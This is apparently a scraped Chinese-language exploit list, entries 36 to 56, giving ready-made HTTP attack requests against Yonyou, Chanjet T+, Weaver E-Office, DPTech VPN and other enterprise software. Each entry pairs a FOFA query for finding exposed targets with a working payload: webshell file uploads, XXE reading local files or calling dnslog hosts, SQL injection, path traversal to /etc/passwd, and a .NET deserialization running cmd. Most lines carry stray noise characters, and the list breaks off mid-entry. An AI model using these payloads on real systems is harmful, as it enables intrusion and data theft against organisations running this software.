0 D3 ?- n( J8 Z Z8 SPOST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1" s8 K* E4 D5 N e' C
Host: 203.25.218.166:88885 x% Q8 t0 H) J
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info+ r4 b# x) i! J% X: P
Accept-Encoding: gzip, deflate" G; ^4 o& P4 {4 ?/ X( Q" R, j
Accept: */*
( C6 Y3 L4 @) F% wConnection: close
' b. X8 b D1 X2 ?$ J; _4 j2 w$ ^" E* eaccessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA# M. b, e' S0 S
Content-Length: 190
) d# w- M% T9 ^Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df09 Q. p% d" w) s" W# S
4 P+ N# @* x9 z$ F: ~: T
--fd28cb44e829ed1c197ec3bc71748df0
8 ]) D/ T3 w6 M. L: y6 e+ n8 vContent-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"
' k) [2 N4 D9 u, s, P4 {7 B1 l
" r8 B' ~ B: ]" n<%out.println(1111*1111);%>
6 A, Z+ `- z' I, f--fd28cb44e829ed1c197ec3bc71748df0--: Z, \9 J- Y9 r+ Z5 d0 ]
" m/ ]0 m, h0 H& r1 A
# c! S4 J; m8 T$ y$ U
36. 用友NC-Cloud soapFormat XXE$ l! w( O1 @" m2 E4 j
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
1 ` ?) ~% K. H( H7 H$ b0 gPOST /uapws/soapFormat.ajax HTTP/1.13 ]- N" }& t6 n. E/ h
Host: 192.168.40.130:89893 O+ g- a3 H5 B* G+ K# T) t
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0( ~8 I @: D+ X0 [
Content-Length: 2639 |7 n& U, u" ?: L
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.88 S0 Y( X0 M2 ~' x0 f0 |
Accept-Encoding: gzip, deflate
2 J) b4 X( m& WAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2- |! Q8 f2 s3 Y% S8 X3 f4 U
Connection: close8 E) `3 F& Z! b4 o$ s6 k2 s, L
Content-Type: application/x-www-form-urlencoded& X) m8 d5 v7 t4 y1 i4 Q7 |; H
Upgrade-Insecure-Requests: 1
6 A& @* E3 p$ s. ?; R Y
+ b3 p+ x$ _1 D# }* H: ^; n7 _msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a
; g+ N8 {. ?, A- k6 P$ E* _
$ ~7 V2 b6 _3 F1 D
0 D' y2 K. U! _6 i4 O$ k7 |37. 用友NC-Cloud IUpdateService XXE
, b8 v; x' c" [" x0 T) t' ZFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"' z/ Q1 H3 Q* q4 h0 i
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
) M2 P" ^3 L& Q# |- j2 D- JHost: 192.168.40.130:8989. ^+ I0 Y6 [8 ?$ [$ Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
) \% I0 N+ f& Y$ c4 k! B% hContent-Length: 421
# D. }7 f. ^! ]1 m, KAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9/ y% K1 |( `6 J; g$ o' M* y
Accept-Encoding: gzip, deflate
( }" G* H3 g/ k7 IAccept-Language: zh-CN,zh;q=0.9
" }, N3 [( L4 \* m, O, iConnection: close& U6 c# R$ W. B( w! i8 `* k
Content-Type: text/xml;charset=UTF-8
0 z- I) T( @( Q8 M$ ZSOAPAction: urn:getResult, A) I% I( l" [6 n
Upgrade-Insecure-Requests: 1
2 |1 P5 Z1 V8 g4 y. B" B4 e& o* V0 |/ p5 Y
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
! T# ~& c6 j! Y$ M( G<soapenv:Header/>
* G! y8 [, y; a7 p1 Z' K' I<soapenv:Body>9 u* T8 q6 ?" N
<iup:getResult>
: y" @' d4 @+ g8 L# p<!--type: string-->
" S( f$ T4 R R<iup:string><![CDATA[
/ ]+ M$ ~+ }; i+ [+ @<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>7 E3 ]! B2 Z+ P5 i$ e9 \" z
<xxx/>]]></iup:string>
0 d; k! D: c- I* I. ]: D+ p</iup:getResult>* Z; G! i( L3 C/ X8 \
</soapenv:Body>
4 `* P3 d5 ~6 D3 t% \</soapenv:Envelope>
{1 L5 g( D0 m
1 J* B, _4 W6 m2 S) b; \8 D
' q8 n; }/ t4 r/ V$ K& x
8 p, K! a, P. E4 Z# f38. 用友U8 Cloud smartweb2.RPC.d XXE; V8 b& i- i6 @4 T! P/ M$ i
FOFA:app="用友-U8-Cloud"
; q5 W& i8 X2 b( T& MPOST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
5 d: u$ i5 P4 u: n; M) THost: 192.168.40.131:8088
% P" m+ C! ?1 nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
; F) C8 E4 ]" g) m1 c6 M, WContent-Length: 260# `2 [3 q5 ^+ r
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3% U. n6 T- S6 v4 j- y7 V* [
Accept-Encoding: gzip, deflate
% Y$ _. ]$ E: q8 @# r3 VAccept-Language: zh-CN,zh;q=0.96 \- j- j4 T2 q3 N
Connection: close
& ^+ Y+ i: Y7 D$ L9 ?Content-Type: application/x-www-form-urlencoded
$ d3 M6 }6 H+ m" J! ` j/ o! C3 t8 D- _! t7 Q
__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>
2 N* a/ _5 K6 B6 {. n$ ]& t) o- h& M! S
7 F) Y2 o9 W9 @8 k$ _4 e39. 用友U8 Cloud RegisterServlet SQL注入
! s2 Z$ x% {( W6 bFOFA:title="u8c"" X1 y) E$ N/ J. V9 K
POST /servlet/RegisterServlet HTTP/1.1
, G4 Q6 @: ?/ u$ V8 V6 ~. fHost: 192.168.86.128:8089
7 o. A$ N- n2 q/ y( YUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
. t3 I) Z- \: }# bConnection: close
+ m% d$ `( k2 PContent-Length: 85% m' } _8 `; ~7 W @) Z
Accept: */*
1 t. J) O* j- G/ N9 z4 J/ Y1 L/ aAccept-Language: en. [7 }6 `( n5 t( k2 U) M3 v5 h* a% H% s
Content-Type: application/x-www-form-urlencoded# m+ ^$ d5 o+ y- s$ }
X-Forwarded-For: 127.0.0.1) ~6 O8 ?# ?9 r
Accept-Encoding: gzip
- }0 t( T g/ q( X$ M
9 B* G4 k' T8 e& Y. F [$ k1 kusercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--7 O4 X/ _" S# \+ d; G5 R
2 n5 p. B1 R! O) X; q6 H, i7 Q- j8 y
2 e1 L$ u4 e) ?6 l& f40. 用友U8-Cloud XChangeServlet XXE* y& c1 F$ h' M/ R( s
FOFA:app="用友-U8-Cloud"' L) F& p% {# ?
POST /service/XChangeServlet HTTP/1.16 i) r: O; ]+ ]+ \) ?
Host: x.x.x.x
0 `+ R5 o/ Y8 f2 f0 cUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
2 x: w$ R t, R' _" Q( ]- IContent-Type: text/xml
* v7 C6 C# n/ g. ZConnection: close) i! n2 {9 q) @( k4 U, f
- n) \7 u9 @- r. {<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>
! _& ~% U4 K2 u' V* b5 v8 N% V9 X
4 x5 x; P5 [$ o+ {1 k* i% g( c) q; n. r+ v
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
$ f9 i" Y, m7 w( w$ Q) @FOFA:app="用友-U8-Cloud"6 E# n! b: s7 f2 {) C! R6 h
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
, T8 W7 J# N1 L$ @( eHost:
/ k# ]4 i" k1 U& ]User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15' R# ^2 ^2 M! m. v9 i7 Z
Content-Type: application/json3 n( K3 S& Z5 k1 Y/ [7 a
Accept-Encoding: gzip
: x/ d# ]' h. P2 U2 X7 m$ rConnection: close
% Y2 [, ?/ \+ q/ c3 G* | {
. A5 e C6 V4 p+ T3 v8 C) e5 G; U7 x Y. q$ Q
42. 用友GRP-U8 SmartUpload01 文件上传
: R1 x: A( {* m) F/ V* U3 Q# m1 SFOFA:app="用友-GRP-U8"
' z# U9 ]3 `+ w1 e2 E" d2 [7 APOST /u8qx/SmartUpload01.jsp HTTP/1.1' s" O6 G5 t$ b E$ C
Host: x.x.x.x5 [5 e4 p" ]" {/ E
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
6 B- H' m; m" O) A1 @, uUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36 I; H% A9 D; u5 {7 p0 N
8 l7 a7 K) A. ~( u) ]PAYLOAD8 q. w5 P2 Q5 M: {5 d8 Q5 v- R
& h/ `8 H% z1 X2 F+ c0 ^) e
5 ] `" a6 F! ^5 ~ @- _
http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml
, H. o5 J$ t% C4 h% k* A: S5 a7 A) |! N' l4 U( f. N
43. 用友GRP-U8 userInfoWeb SQL注入致RCE$ t$ k( a* }( c/ Z4 D/ @
FOFA:app="用友-GRP-U8"3 T! P+ E4 c8 x% K, K8 p
POST /services/userInfoWeb HTTP/1.1# i. D: \; o- J+ I1 n
Host: your-ip
, p. }( d! v* R2 `) W N( _6 Q* WUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.366 G. s/ `# H' A3 p- v, g: p
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
* y1 A$ X, s" ?Accept-Encoding: gzip, deflate
+ g% L9 g7 Y: M6 Z$ b! u8 }6 a* _Accept-Language: zh-CN,zh;q=0.92 v5 Z$ j7 H) F0 O# J" O
Connection: close. F+ c" G% S5 I- n
SOAPAction:
& Y5 R9 Z3 s) `' q% UContent-Type: text/xml;charset=UTF-86 N/ f! N1 Z5 {' A% N
$ {( A R) R% j+ c3 t9 {6 ]# k
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
$ U5 c0 e# i- D/ A <soapenv:Header/>& }) P& P: S$ E2 V$ u# K- {
<soapenv:Body>
4 ^, y, A& u5 n/ L( E <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">& V& G' o( ^2 x( E; o/ x
<userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
5 V9 a: t) Z+ ^& H- _9 n </ser:getUserNameById>6 P+ |: `; H! g) j5 m9 X( l6 l9 b/ I
</soapenv:Body>+ ^3 v @9 F) ~' @0 ^, f
</soapenv:Envelope>
& [9 V r6 @- z o. D3 \. l7 {: S* w2 S ]1 z
: x; e9 R4 h: {6 g2 w44. 用友GRP-U8 bx_dj_check.jsp SQL注入1 n: Q, M# C% y5 F3 ^
FOFA:app="用友-GRP-U8"
% q) H* E* S& |8 {6 |8 F p) I) xGET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.11 `/ M! i/ I x! S& X" B# u( ?8 F
Host: your-ip
& s+ T# b) J" E9 R& nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 `/ T# ~2 ]( F( i( a
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7/ w8 }8 o7 N3 {+ K- l
Accept-Encoding: gzip, deflate
4 m2 _- L8 U8 l R, {Accept-Language: zh-CN,zh;q=0.97 \' W) g+ \% Q; X0 g
Connection: close" s- Y0 V, L, W+ G" ~4 ~, Q
4 I1 d5 p6 m8 v8 S7 a& ?, ^$ q9 S1 D* }- E4 ]8 \
45. 用友GRP-U8 ufgovbank XXE3 e6 [/ y4 [' G0 F
FOFA:app="用友-GRP-U8"
1 M% r1 k+ P* K0 e1 M, VPOST /ufgovbank HTTP/1.1
, q, Z3 e7 e) O; ?$ MHost: 192.168.40.130:2229 H: K. Y" S0 W$ Q/ s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0% {8 w( B5 L& m! D9 b! _# `$ U7 {; n
Connection: close
, K V% R5 }( i, KContent-Length: 161. p; n( l+ S, h; F2 L' e
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8; B9 S* s$ q5 W! S9 p8 K1 c( i
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
- C' i; m4 i9 S- E0 S" d xContent-Type: application/x-www-form-urlencoded! R+ B+ d4 @8 O- x* ~- _( c2 G
Accept-Encoding: gzip
. N+ J$ ]2 u# T( R8 }' j$ e: @5 S
5 o6 ~: w8 M# v" S9 J9 OreqData=<?xml version="1.0"?>
3 ^7 ]4 o- e; s5 W3 a<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest
: u) L! f4 ]8 H. D& {1 C" A# d7 x# G5 Z. w
" l' c2 e9 |. X* D @/ ?46. 用友GRP-U8 sqcxIndex.jsp SQL注入
% |* f. P/ E( ]2 }/ n* o* QFOFA:app="用友-GRP-U8"' i" E( N2 v% _7 O! g8 n
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.18 }7 q- j: Z0 z3 `$ f9 _" V; c4 m
Host: your-ip
- b4 K i. c0 b9 t; c: G; D VUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
, P7 a7 R2 ]) N9 dAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7* P9 x, q! W0 z! t
Accept-Encoding: gzip, deflate
0 h3 \9 \( ]' m! S1 j+ ^2 dAccept-Language: zh-CN,zh;q=0.9
# C/ A. ?! @, z; R/ V( n* nConnection: close
3 w+ Y* a1 s5 E5 [
6 N: i5 W# [* g, }7 v. B
3 C" O4 j% ?$ ]' q47. 用友GRP A++Cloud 政府财务云 任意文件读取
3 x3 H0 ?1 U% c% P% D; g! V! FFOFA:body="/pf/portal/login/css/fonts/style.css"
$ x+ ?3 N1 n; B1 J, m4 M+ s8 YGET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.11 p/ L) q% j+ U- ?
Host: x.x.x.x
: x- `% x% A3 ^7 c: `* |Cache-Control: max-age=0
( a' i3 J: \) mUpgrade-Insecure-Requests: 13 `& i2 R4 W- N5 B9 x1 G
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36& \# M$ f O, G5 z" @$ Q! P
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
3 Q1 p+ J N, N+ I" U7 V6 w; h# u2 BAccept-Encoding: gzip, deflate, br
8 b7 K) H' |6 \4 h' KAccept-Language: zh-CN,zh;q=0.97 H* C& d# P% r
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
9 s; [. i( b/ A1 a: e/ {7 MConnection: close+ T8 ^: \5 D. l( Y d. L0 U
: e9 b/ c3 ~/ f% W
" D: i: _) N, P# c/ r0 }9 Y) ^ W- V1 A/ r/ _
48. 用友U8 CRM swfupload 任意文件上传
$ k2 `8 V! T' P' G! ~% E4 c0 [FOFA:title="用友U8CRM"
; n z" V1 J4 l* r% oPOST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
& M* Q4 T4 w: U4 UHost: your-ip
! i' p& |7 M7 oUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.03 b L2 h! `5 Y; x- f
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
. ^$ D/ O, k3 a! b) i h+ D tAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.28 ]! n3 E3 l2 N
Accept-Encoding: gzip, deflate% b( U# ^7 H! \8 t% X v
Content-Type: multipart/form-data;boundary=----2695209672394068716424300668559 S+ W6 E: H$ m0 p# x
------269520967239406871642430066855
5 c: k* p% {8 r7 ?' ~- \Content-Disposition: form-data; name="file"; filename="s.php"
6 @% `5 G/ C1 x& X# j: J* r! t1231 X6 {, _2 V9 x% n O- J" h
Content-Type: application/octet-stream% }& T) G- V# k4 Z! m
------269520967239406871642430066855% \5 ^; M: a) ^) G9 c: [* Y
Content-Disposition: form-data; name="upload"
2 t& \: R& H4 S! ~- z; iupload
4 H+ L. l" ~2 s! q# t! _------269520967239406871642430066855--- N# [1 Z$ l+ U, C( w
0 S3 C/ r" O' d' y& V
: a% F! T9 A D4 V9 a49. 用友U8 CRM系统uploadfile.php接口任意文件上传
2 e( ^% w' q& v2 @+ J# kFOFA:body="用友U8CRM"
0 z& K7 H0 G; v" h9 E5 L0 b% D) g6 Y& z
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.17 I& l* O8 K% ~+ M2 K i
Host: x.x.x.x
- ~. O# ^+ W% HUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
1 `7 b, @7 B7 L+ @- t5 @% g& OContent-Length: 329) ^* D9 L+ ^# _( @8 H C
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.82 ~( c" x" @" _3 O# _1 x
Accept-Encoding: gzip, deflate
+ [- x% Z B; y* oAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2' O" [4 ?8 S f& j( l. c
Connection: close
; R2 N7 t! q* M4 `Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w; X% I) |) Y x
. m8 s/ t- Z) L
-----------------------------vvv3wdayqv3yppdxvn3w
- k9 O0 o$ M S' ^4 t; }Content-Disposition: form-data; name="file"; filename="%s.php "
8 Q: m) _% \' }0 z9 p4 }Content-Type: application/octet-stream
" s, i7 A! f. ^" W b6 y9 v! r0 v
+ n2 j/ ~+ ^/ p0 N( H# Twersqqmlumloqa
$ a& y6 S: p" S, x, \-----------------------------vvv3wdayqv3yppdxvn3w
$ X6 H4 N3 d S. UContent-Disposition: form-data; name="upload"
4 C$ k o* o; |- i9 B, e8 `% b0 F: n% }7 b* G# b3 M6 Q
upload1 o7 w) u$ x! r0 a% l6 [3 W8 }, s; r
-----------------------------vvv3wdayqv3yppdxvn3w--* c, f$ G- ^5 q% c+ x9 ]
" F! T& ~5 I O9 ]5 L' `4 s8 O
. t: f+ P4 ?0 H1 Rhttp://x.x.x.x/tmpfile/updB3CB.tmp.php
0 X* d8 O3 U- e' q# I/ V
: n& e& V a) S0 D50. QDocs Smart School 6.4.1 filterRecords SQL注入7 [& o6 A* e, [' }' N) R. ~
FOFA:body="close closebtnmodal"* f. C$ {" j% a: J
POST /course/filterRecords/ HTTP/1.19 W0 T; F* z6 j! p; I6 t
Host: x.x.x.x
% e1 M) f0 P( u: W( D8 yUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36) D, h7 X: |9 S% P
Connection: close
H! B6 f+ A V! U( r% mContent-Length: 224% T+ b' R, a1 G3 a. c7 w
Accept: */** Q* E! b4 v& d! K1 t
Accept-Language: en
( f, P/ i! w4 h% W' WContent-Type: application/x-www-form-urlencoded! E* l' {6 P3 L0 P' \9 W: _
Accept-Encoding: gzip
1 N3 l/ M* f1 M8 V4 Y4 r. S: H1 s2 R$ z4 \3 H' q
searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1
! n1 s K) W3 R! I# {
5 ]' J& z" J* J/ D/ _
* {6 M( ?9 [0 c9 }$ ?! r( @51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
2 l8 ~$ V) g; O7 \* DFOFA:app="云时空社会化商业ERP系统", [( G/ \9 o# C% G) `( ^
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
$ L9 e) ~* L! p( W7 RHost: your-ip
$ p* S- \; D7 {! z6 ^' fUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
9 C4 a. m+ J+ j9 g, a1 @Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.97 e+ K. a2 d# ^5 g- }' K4 E
Accept-Encoding: gzip, deflate
& C+ J7 S$ J- N+ W2 \4 a5 Y/ M* BAccept-Language: zh-CN,zh;q=0.9
# `$ q# r- O7 s: Y+ I0 YConnection: close7 G/ U* N, B+ p4 _, f) F9 n
/ s5 x9 h* ~8 m# b Y9 P/ H. f1 b( E/ O3 N1 h9 s$ F: A8 L
52. 泛微E-Office json_common.php sql注入
% `1 M' ]8 e% @' E/ H! d, UFOFA:app="泛微-EOffice"
: Y$ H7 W* Z HPOST /building/json_common.php HTTP/1.1# U" Y9 Y& P) T% T* U- F; G
Host: 192.168.86.128:80977 n! h( B$ J' j- @
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
6 e1 r3 Z) F' F" {: oConnection: close
, r( U4 o+ M3 S% h3 D, EContent-Length: 87
' V3 m$ X, g$ sAccept: */*
# ?' h: u; ^! L& u) p( HAccept-Language: en
3 }+ f% X: H+ E5 Q' N: b; Z8 V( lContent-Type: application/x-www-form-urlencoded
4 N2 g; L! O" }+ d. Y1 ^Accept-Encoding: gzip
) y4 n/ X2 ?7 `) y) i" s& \
Q2 i: r* ?1 U1 H2 ktfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|3335 G& Y( Z% c- T6 g2 H
& d a5 U/ G8 F6 I3 F
- Z6 j1 n+ y! w% @2 N6 @9 G% o- T, O7 u. E
53. 迪普 DPTech VPN Service 任意文件上传
# m9 F2 Q2 p2 }FOFA:app="DPtech-SSLVPN"! F7 L/ o& }9 u. s1 N! i
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd. c* l& E5 a- ~; x$ r5 L7 l* v
! P! X3 r. H% E. c; } m r
2 o C* ~- d$ _- u54. 畅捷通T+ getstorewarehousebystore 远程代码执行3 r. {; r9 e4 h2 P3 Y# u) l; y- B& l2 L
FOFA:app="畅捷通-TPlus"- E% r8 Y5 E# |' Y: M0 K
第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件
$ V7 K+ h. x, B) b"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
# H5 @- t7 N3 o9 b! A \* b4 j; J1 I# U
; [8 m y; t q# g' q+ G* Y! |完整数据包* Y, Z% o7 Q3 f* \9 i* O
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.14 M. h# u1 f, ?! ]' H# ]
Host: x.x.x.x) G# O @% P5 o
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
2 k+ n6 }5 |( v8 Q6 N/ A% \8 Y7 ?+ y. `Content-Length: 593% P. E; j8 K" D+ t4 B: q! X( y
6 f7 o# X% \2 |+ O; ~6 B/ M{
+ Z, {2 g) ^6 J L2 l"storeID":{7 w E8 P& Q9 v
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
( e" y9 {( X1 A- j "MethodName":"Start",3 R+ ^( v3 Y7 T! V) t; m* A" P$ t! M
"ObjectInstance":{
7 q8 H4 u5 [" E+ I7 ^( B "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",# C- T7 i6 Y% a0 u7 @
"StartInfo":{
|6 B! h, `/ _" Q: l( ?0 [ "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
/ ]; C- A2 P& l. v" ]7 u5 Q2 B/ E "FileName":"cmd",9 v; d% i4 h& w- Z& b
"Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
8 }3 d* V* x% p$ C* @- X }9 Y6 {6 \: \; G8 \3 \
}8 @) Y9 \% |% z7 j$ F
}
" V- g# [6 t1 S}
: z, B- O4 V- M8 A5 c b+ N# X$ E6 e* l# v% |
# g6 `' F) L& b: Y+ e第二步,访问如下url7 d1 h% k4 B x2 g% B: r0 O) d
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt: O% a; E: j0 z( e/ l
P. v* ^4 r" t9 k' h4 |+ `- F( S# D3 \9 l( F. g4 O
55. 畅捷通T+ getdecallusers信息泄露
* K; R3 i" f$ D+ Y& C) S8 o! \FOFA:app="畅捷通-TPlus"3 z) T. X2 j+ _' ]
第一步,通过
0 ]/ R' `+ A- A3 X/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie
' f6 b% p! [* u( U; N+ R2 A. [第二步,利用获取到的Cookie请求
, l/ }) s* C# C' l) O/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers
( ], h" j" j7 b M( K% E4 t, A
3 }8 Z- \- P6 m- i, `56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
4 N) w% k% M& h/ a& tFOFA: app="畅捷通-TPlus": w) q6 w, J8 [
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.12 W- w! d3 I: n5 S
Host: x.x.x.x% F0 _/ _+ E2 q
